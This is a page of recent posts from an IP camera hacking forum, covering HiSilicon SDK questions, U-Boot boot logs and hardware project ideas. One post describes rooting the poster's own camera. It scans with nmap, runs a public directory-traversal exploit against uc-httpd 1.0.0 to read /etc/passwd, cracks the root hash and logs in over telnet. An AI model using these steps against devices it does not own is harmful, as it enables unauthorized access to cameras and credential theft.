News:

Registered a URL and setup a forum as the IPCam stuff really needed its own site vs my irregular blog posts about IPCam hacking at http://www.computersolutions.cn/blog

Recent Posts

Pages: 1 2 [3] 4 5 ... 10
22
Hacking & Modding / Re: In over my head/dumb questions
« Last post by admin on July 14, 2017, 02:13:09 am »
Really depends on the board you have, and what gpio's are available to use, and how much flash / ram (for user space software etc).

Do you have the Hi3518e SoC SDK?

You'll need the SDK to get started, and compile a rom with kernel, userfs etc
Maybe the supplier will give you a ready to use kernel/rom/userfs that you can start from.

You'll need to have a  uBoot on the board.  Hopefully will have one already, otherwise you'll also need an SPI flash programmer to program the uBoot.
You'll need to be able to setup a crosscompiler environment (suggest use Docker or similar virtualized system to setup, then you can migrate easily).
You'll need to unpack the SDK, then be able to compile kernel.
You'll need to learn how to setup rom in flash.

Suggest read the uCLinux posts from 2011 where I talk about similar things.  Its relevant, although not 100% relevant to your particular board.


Also suggest reading other peoples posts, e.g. https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/

Good luck.

Might want to think about using something like an ESP8266 for your gimbal to control sensors, as that has wifi, and they're dirt cheap.
23
Firmware / Hi 3518E BLK18E-0012 50h10PE-WP Firmware
« Last post by winek0 on July 09, 2017, 04:00:13 am »
Hi I have a problem with my camera after the update does not start looking for a firmware for it.



U-Boot 2010.06-svn (Oct 14 2015 - 15:07:23)

DRAM:  256 MiB
Check spi flash controller v350... Found
Spi(cs1) ID: 0xC2 0x20 0x17 0xC2 0x20 0x17
Spi(cs1): Block:64KB Chip:8MB Name:"MX25L6406E"
envcrc 0xd2097268
ENV_SIZE = 0xfffc
In:    serial
Out:   serial
Err:   serial
Press Ctrl+C to stop autoboot
CFG_BOOT_ADDR:0x58040000
8192 KiB hi_sfc at 0:0 is now current device

### boot load complete: 1973968 bytes loaded to 0x82000000
### SAVE TO 80008000 !
## Booting kernel from Legacy Image at 82000000 ...
   Image Name:   linux
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1973904 Bytes = 1.9 MiB
   Load Address: 80008000
   Entry Point:  80008000


load=0x80008000,_bss_end=80829828,image_end=801e9e90,boot_sp=807c7168
   Loading Kernel Image ... OK
OK

Starting kernel ...

Uncompressing Linux... done, booting the kernel.



24
Hacking & Modding / In over my head/dumb questions
« Last post by salukikev on July 05, 2017, 01:55:27 am »
Hi guys,
I'm delighted to have discovered this forum recently as I'm expecting the arrival of a 32x32mm 720P IP camera tomorrow featuring the Hi3518E (https://www.alibaba.com/product-detail/720P-CMOS-Onivf-IP-module-H_60352228981.html).

I've read this is a popular configuration to access and hack the linux OS.   Unfortunately this is one part of a much larger project and I'm a terrible programmer only just getting familiar with Linux itself.  My focus has always been on mechanical items, but I'm familiar enough with electronics- this is still very new territory for me.  So apologies in advance for any ignorant questions.

1. The system that controls this camera will have two sets of coordinates for it's 2 axis gimbal system.
2. Self-contained values for X & Z axis motors, I say self contained because values need not come from the Ethernet port, but rather from a MPU6050 sensor or similar, so yes- it will be trying to level itself out continuously.
3. The other set of values WILL need to come from the ethernet connection and they will constitute an offset value so that the camera can be driven to move from the other (leveling) values.

I realize that it is almost certain that I will need a separate microcontroller to handle this, but I thought that maybe at least the 2nd set of values could come through the IP camera board since it will already be networked, and will require negligible bandwidth, and I could thusly avoid all the complication of adding a separate board, ethernet hub/switch etc. etc. only to get a few PWM signals in there.  Space is at a premium for this application.

Short of that, I arrived here reading up on ways to reduce video latency.  This particular IP camera will go through a 10/100 mini ethernet media converter (fiber optic 9/125) as well.  Due to aforementioned size constraints I'm settling for 720p at 30fps even though I was shooting for at least 1080p.  This board in particular is only 32x32mm in physical size, so I've got that going for me, which is nice.   I'd welcome any suggestions on finding something smaller or higher resolution at that size (or actually a round PCB would be nice even though I don't expect to find that).   OR something of similar size with a remote image sensor (via flat ribbon cable).

Anyway, as you can see, I have a lot of different directions I can move on this project.  I'm funding this out of pocket right now, but if things work out I could turn a profit someday.  As such, I'd be willing to hire someone to help with this or possibly some equity arrangement- but short of that, I'd surely love some free advice and guidance before I spiral off on a tangent here.

Anyway, thanks in advance for any tips to get me moving toward a viable solution!   have a great day!
-Kevin


25
General Discussion / Re: Secure Methods Using PHP To display Your IP Camera
« Last post by OldRadioGuy on July 03, 2017, 05:49:26 pm »
Don's website is down.  Anybody have a copy of SecureImageDisplayV50.zip available?
26
Help / How I got root on my camera
« Last post by tanranger on July 02, 2017, 04:22:42 pm »
My camera uses a mobile app (Showmo) to use a China based cloud service for all device control. I tried to http directly to the camera with my browser but all I get is a blank listing of "Index of /mnt/web/".

So I did a bit of sleuthing and found this:

https://nmap.org/book/vscan.html

So I tried that out:

Code: [Select]
$ nmap -sV -T4 -F my.camera.ip.address
This reports the following:

Code: [Select]
Starting Nmap 7.01 ( https://nmap.org ) at 2017-07-02 15:41 EDT
Nmap scan report for 192.168.1.121
Host is up (0.89s latency).
Not shown: 98 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet  BusyBox telnetd
80/tcp open  http    uc-httpd 1.0.0
Service Info: Host: IPC365

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds

So it's running uc-httpd 1.0.0.  Well a bit of googling later I come to learn that this is a httpd with a directory traversal bug.

https://packetstormsecurity.com/files/142131/XiongMai-uc-http-1.0.0-Local-File-Inclusion-Directory-Traversal.html

And there's a little python program provided to attack my camera.

Code: [Select]
$ python2 pwn.py http://192.168.1.121
[+] uc-httpd 0day exploiter [+]
[+] usage: python pwn.py http://<target_ip>
[+] File or Directory: /etc/passwd
Exploiting.....


root:my-password-hash-here::/root:/bin/sh

So then I fed this into johntheripper with gpu acceleration and I got my root password in a few minutes.

Code: [Select]
$ telnet 192.168.1.121
Trying 192.168.1.121...
Connected to 192.168.1.121.
Escape character is '^]'.
IPC365 login: root
Password:
login: can't chdir to home directory '/root'
Welcome to

    _____    __      ___       __     ___       _     _    _
   |  ___|  /  \    / __ \    /  \   |  _ \    /  \   \ \ / /
   | |___  / /\ \  | /__\ \  / /\ \  | | \ |  / /\ \   \ V /
   |  ___|| |__| | |  _   / | |__| | | | | | | |__| |   \ /
   | |    |  __  | | |  \ \ |  __  | | |_/ / |  __  |   | |
   |_|    |_|  |_| |_|   \_\|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.faraday.com/



BusyBox v1.19.4 (2014-12-19 12:49:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

So I poked around and learned this a GM8136 device.

I noticed that an SDK for a similar chip was available on openipcam, so I used that filename as an example of the naming convention and searched for "GM8136 SDK release v1.0.rar" and discovered dozens of download links. I had to guess what a download button looks like in Chinese, but I figured it out.

Following the instructions in the SDK, I was able to crosscompile a full copy of busybox and get it into my /tmp/ directory and it works beautifully.

Poking around, I've learned the following:

Essentially all of the application code lives in an encrypted (blowfish-448) ELF which uses a common unix command as its filename (possibly to make googling harder). The encrypted ELF has formatted the SD card to the WFS0.4 encrypted filesystem so it can no longer be mounted and used to store my own application data between reboots. Also, whenever I try to kill the encrypted ELF process, the camera promptly reboots after a short delay.

So the punchline is that I have root over telnet, but I cannot access the camera output, my images, or my videos. I can run my own code, but I'm stuck for now with this mystery app that may or may not be adequately secured and could conceivably already be compromised with no way for me to tell.

One bit of good news is that /proc/config.gz is present if I decided to try to roll my own kernel.

So that's how I got this far. I hope my experience helps others to explore their own cameras.

Anyway, what now?
27
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 28, 2017, 03:23:33 am »
I'm pretty new about that module. I don't know how I do. Can you help me if you know something?

Also I want to use this module for image processing. There are some OS in that. How can I change some files in it? I wanna do some image processing with it. I need to do modification and add some code to OS. Can I do that?
28
Firmware / Re: Hi3516 Unknown command 'root' - try 'help'
« Last post by admin on June 24, 2017, 05:00:51 am »
Not an error,  you're in the bootloader - u-boot.
You need to boot past that into the OS.


29
Firmware / Hi3516 Unknown command 'root' - try 'help'
« Last post by anil_argede on June 19, 2017, 06:41:23 am »
Hi everyone,
I tried access to Hi3516 in my camera module. I used from a link to do this.
Link: https://felipe.astroza.cl/hacking-hi3518-based-ip-camera/
I wanna access root but got an error.


System startup


U-Boot 2010.06 (Jun 28 2016 - 09:04:41)

Check Flash Memory Controller v100 ... Found
SPI Nor(cs 0) ID: 0xc2 0x20 0x18
Block:64KB Chip:16MB Name:"MX25L128XX"
SPI Nor total size: 16MB
MMC:   
EMMC/MMC/SD controller initialization.
Card did not respond to voltage select!
No EMMC/MMC/SD device found !
In:    serial
Out:   serial
Err:   serial
Hit any key to stop autoboot:  1 ... 0
hisilicon #
hisilicon # root
Unknown command 'root' - try 'help'
hisilicon #
hisilicon #


Any ideas to solve this error? I already apologize for my english.
30
Help / Any instant on cameras?
« Last post by SlowBro on June 13, 2017, 03:49:47 pm »
Are there any cameras that come on very quickly, or which can be put in deep sleep mode to wake quickly?

I'd like to create a wire-free battery-powered motion sensing setup. The motion could be detected via IR sensor and a microcontroller could start up a camera. Images would be transmitted over Wi-Fi or cellular.

If the Foscam-style cams offer sleep mode that could work.
Pages: 1 2 [3] 4 5 ... 10